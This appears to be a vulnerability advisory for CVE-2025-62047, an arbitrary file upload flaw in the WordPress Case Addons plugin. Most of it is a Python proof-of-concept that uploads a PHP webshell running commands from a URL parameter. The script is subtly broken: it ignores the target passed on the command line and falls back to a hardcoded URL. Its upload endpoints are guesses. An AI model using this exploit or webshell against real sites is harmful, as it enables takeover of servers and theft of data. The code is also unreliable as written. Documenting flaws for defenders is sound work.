Unrestricted Upload of File with Dangerous Type vulnerability in Case-Themes Case Addons case-addons.This issue affects Case Addons: from n/a through < 1.3.0.
CVSS Details
CVSS Score
9.9
Severity
CRITICAL
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:H/A:H
Configurations (Affected Products)
No configuration data available.
Case Addons插件 < 1.3.0
PoC / Exploit Code
⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
import requests
import sys
# CVE-2025-62047 PoC - WordPress Case Addons Plugin Arbitrary File Upload
# Target: WordPress site with vulnerable Case Addons plugin (< 1.3.0)
TARGET_URL = "http://target-wordpress-site.com"
# Common upload endpoints for Case Addons plugin
UPLOAD_URLS = [
f"{TARGET_URL}/wp-admin/admin-ajax.php",
f"{TARGET_URL}/wp-content/plugins/case-addons/includes/upload.php",
f"{TARGET_URL}/wp-content/plugins/case-addons/ajax/upload.php"
]
# PHP webshell payload
WEBSHELL = "<?php if(isset($_GET['cmd'])){ system($_GET['cmd']); } ?>"
def exploit(target_url):
"""
Exploit arbitrary file upload vulnerability in Case Addons plugin.
The plugin fails to properly validate uploaded file types.
"""
files = {
'file': ('shell.php', WEBSHELL, 'application/x-php')
}
# Try common upload endpoints
for upload_url in UPLOAD_URLS:
try:
response = requests.post(upload_url, files=files, timeout=10)
# Check if file was uploaded successfully
if response.status_code == 200:
print(f"[+] Potential upload successful at: {upload_url}")
print(f"[+] Response: {response.text}")
return True
except requests.exceptions.RequestException as e:
print(f"[-] Failed to upload to {upload_url}: {e}")
continue
return False
def main():
if len(sys.argv) > 1:
target = sys.argv[1]
print(f"[*] Starting exploitation of CVE-2025-62047 against {target}")
exploit(target)
else:
print("Usage: python cve-2025-62047.py <target-url>")
sys.exit(1)
if __name__ == "__main__":
main()